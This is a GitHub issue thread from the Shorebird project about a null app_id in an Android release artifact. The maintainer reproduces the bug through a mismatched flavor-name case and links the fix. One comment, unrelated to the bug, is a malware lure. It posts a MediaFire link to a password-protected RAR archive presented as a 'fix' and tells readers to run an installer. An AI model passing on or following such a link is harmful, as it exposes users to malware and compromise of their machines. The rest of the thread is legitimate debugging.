### ISSUE TITLE
fix: null app_id in release artifact `shorebird.yaml`

### ISSUE THREAD

**Issue by bryanoltman** [shorebirdtech/shorebird#2446]
App ID: b465e35b-2f59-472d-8229-9f464c906f4f

**Description**

The release aab somehow has a null app_id. 

Culprit line: https://github.com/flutter/flutter/compare/3.24.1...shorebirdtech:flutter:shorebird/dev#diff-f0cdaf8963c97a175f64fe0fad130260d0614dd6cecd5cbe9580628bd51c5a4cR1407

Waiting for the user to reply with the command they used to generate this build and/or repro steps.

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bryanoltman** [comment]
The command run by the user: `shorebird release android --target ./lib/main.dart --flavor user_App`

**Comment by bryanoltman** [comment]
I'm able to reproduce this by:

1) Creating an app with flavors (one of mine was `stable_App`)
2) Changing the flavor name in `build.gradle` (changed to `Stable_App`)
3) Run `shorebird release android --flavor stable_App`

See: 

```
08-27 15:34:30.613 32730 32760 I flutter : updater::network: Sending patch check request: PatchCheckRequest { app_id: "null", channel: "stable", release_version: "1.0.0+2", platform: "android", arch: "aarch64" }
```

**Comment by bryanoltman** [comment]
Fixed by https://github.com/shorebirdtech/flutter/pull/63
